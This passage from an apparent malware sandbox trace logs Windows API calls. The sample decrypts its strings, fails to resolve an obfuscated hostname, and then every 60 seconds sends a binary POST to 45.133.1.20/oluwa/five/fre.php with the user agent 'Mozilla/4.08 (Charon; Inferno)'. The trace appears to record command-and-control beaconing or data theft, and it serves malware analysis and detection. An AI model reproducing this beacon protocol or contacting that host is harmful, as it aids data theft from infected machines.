lpThreadId=0x19ff08*=0x48c) returned 0xa88 [0286.488] Sleep (dwMilliseconds=0xea60) [0286.502] GetProcessHeap () returned 0x6a0000 [0286.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0286.503] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.504] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.519] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.519] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0286.539] GetProcessHeap () returned 0x6a0000 [0286.539] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0286.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.540] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0286.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.558] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.559] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.559] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.559] GetProcessHeap () returned 0x6a0000 [0286.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0286.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.561] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0286.562] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.562] CryptDestroyKey (hKey=0x6ad020) returned 1 [0286.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.564] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0286.564] GetProcessHeap () returned 0x6a0000 [0286.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.565] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.566] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.566] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.567] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.567] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.568] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.568] GetProcessHeap () returned 0x6a0000 [0286.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0286.569] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.569] GetProcessHeap () returned 0x6a0000 [0286.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0286.570] GetProcessHeap () returned 0x6a0000 [0286.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.570] GetProcessHeap () returned 0x6a0000 [0286.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0286.571] GetProcessHeap () returned 0x6a0000 [0286.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0286.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.572] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.579] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0286.588] GetProcessHeap () returned 0x6a0000 [0286.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0286.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.590] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0286.590] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.591] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.592] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.592] GetProcessHeap () returned 0x6a0000 [0286.593] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0286.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.594] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0286.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.595] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0286.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.597] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0286.597] GetProcessHeap () returned 0x6a0000 [0286.597] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.598] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.598] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0286.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.599] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0286.600] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.600] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0286.601] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.602] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0286.602] GetProcessHeap () returned 0x6a0000 [0286.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0286.602] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0286.602] GetProcessHeap () returned 0x6a0000 [0286.602] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0286.602] socket (af=2, type=1, protocol=6) returned 0xa8c [0286.603] connect (s=0xa8c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0286.630] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0286.630] GetProcessHeap () returned 0x6a0000 [0286.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0286.630] GetProcessHeap () returned 0x6a0000 [0286.630] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0286.631] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.632] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.632] GetProcessHeap () returned 0x6a0000 [0286.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9ab0 [0286.632] GetProcessHeap () returned 0x6a0000 [0286.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.633] GetProcessHeap () returned 0x6a0000 [0286.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0286.633] GetProcessHeap () returned 0x6a0000 [0286.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0286.634] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.635] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.635] GetProcessHeap () returned 0x6a0000 [0286.635] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0286.635] GetProcessHeap () returned 0x6a0000 [0286.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.636] send (s=0xa8c, buf=0x6bd460*, len=242, flags=0) returned 242 [0286.636] send (s=0xa8c, buf=0x6bb998*, len=159, flags=0) returned 159 [0286.637] GetProcessHeap () returned 0x6a0000 [0286.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0286.637] recv (in: s=0xa8c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0286.723] GetProcessHeap () returned 0x6a0000 [0286.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0286.724] GetProcessHeap () returned 0x6a0000 [0286.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0286.725] GetProcessHeap () returned 0x6a0000 [0286.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9ab0 | out: hHeap=0x6a0000) returned 1 [0286.725] GetProcessHeap () returned 0x6a0000 [0286.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0286.726] closesocket (s=0xa8c) returned 0 [0286.726] GetProcessHeap () returned 0x6a0000 [0286.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0286.726] GetProcessHeap () returned 0x6a0000 [0286.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.727] GetProcessHeap () returned 0x6a0000 [0286.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0286.728] GetProcessHeap () returned 0x6a0000 [0286.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0286.728] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x810) returned 0xa8c [0286.732] Sleep (dwMilliseconds=0xea60) [0286.733] GetProcessHeap () returned 0x6a0000 [0286.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0286.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.744] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0286.754] GetProcessHeap () returned 0x6a0000 [0286.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8598 [0286.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.757] CryptImportKey (in: hProv=0x6bf058, pbData=0x6d8598, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0286.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.761] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.762] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.762] GetProcessHeap () returned 0x6a0000 [0286.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8598 | out: hHeap=0x6a0000) returned 1 [0286.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.764] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0286.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.765] CryptDestroyKey (hKey=0x6ad560) returned 1 [0286.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.767] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0286.767] GetProcessHeap () returned 0x6a0000 [0286.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.768] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.768] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.769] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.770] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.771] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.772] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.772] GetProcessHeap () returned 0x6a0000 [0286.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0286.772] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.772] GetProcessHeap () returned 0x6a0000 [0286.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0286.773] GetProcessHeap () returned 0x6a0000 [0286.773] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.773] GetProcessHeap () returned 0x6a0000 [0286.774] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0286.774] GetProcessHeap () returned 0x6a0000 [0286.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0286.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.775] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.785] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0286.793] GetProcessHeap () returned 0x6a0000 [0286.793] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0286.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.794] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0286.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.796] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.798] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.798] GetProcessHeap () returned 0x6a0000 [0286.798] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0286.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.799] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0286.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.801] CryptDestroyKey (hKey=0x6ad020) returned 1 [0286.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.802] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0286.802] GetProcessHeap () returned 0x6a0000 [0286.802] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0286.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.803] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0286.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.805] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0286.806] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.806] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0286.807] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0286.808] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0286.808] GetProcessHeap () returned 0x6a0000 [0286.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0286.809] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0286.809] GetProcessHeap () returned 0x6a0000 [0286.810] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0286.810] socket (af=2, type=1, protocol=6) returned 0xa90 [0286.810] connect (s=0xa90, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0286.833] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0286.833] GetProcessHeap () returned 0x6a0000 [0286.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0286.833] GetProcessHeap () returned 0x6a0000 [0286.833] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9318 [0286.834] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.835] wvsprintfA (in: param_1=0x6d9318, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.835] GetProcessHeap () returned 0x6a0000 [0286.835] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5740 [0286.835] GetProcessHeap () returned 0x6a0000 [0286.835] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.836] GetProcessHeap () returned 0x6a0000 [0286.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0286.836] GetProcessHeap () returned 0x6a0000 [0286.836] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9318 [0286.837] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0286.838] wvsprintfA (in: param_1=0x6d9318, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.838] GetProcessHeap () returned 0x6a0000 [0286.838] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0286.838] GetProcessHeap () returned 0x6a0000 [0286.838] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9318 | out: hHeap=0x6a0000) returned 1 [0286.840] send (s=0xa90, buf=0x6bd460*, len=242, flags=0) returned 242 [0286.841] send (s=0xa90, buf=0x6bb998*, len=159, flags=0) returned 159 [0286.841] GetProcessHeap () returned 0x6a0000 [0286.841] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0286.841] recv (in: s=0xa90, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0286.933] GetProcessHeap () returned 0x6a0000 [0286.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0286.934] GetProcessHeap () returned 0x6a0000 [0286.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0286.934] GetProcessHeap () returned 0x6a0000 [0286.935] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5740 | out: hHeap=0x6a0000) returned 1 [0286.935] GetProcessHeap () returned 0x6a0000 [0286.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0286.936] closesocket (s=0xa90) returned 0 [0286.936] GetProcessHeap () returned 0x6a0000 [0286.936] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0286.936] GetProcessHeap () returned 0x6a0000 [0286.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0286.937] GetProcessHeap () returned 0x6a0000 [0286.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0286.937] GetProcessHeap () returned 0x6a0000 [0286.937] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0286.938] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2cc) returned 0xa90 [0286.939] Sleep (dwMilliseconds=0xea60) [0286.943] GetProcessHeap () returned 0x6a0000 [0286.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0286.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.945] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.954] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0286.967] GetProcessHeap () returned 0x6a0000 [0286.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8740 [0286.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0286.968] 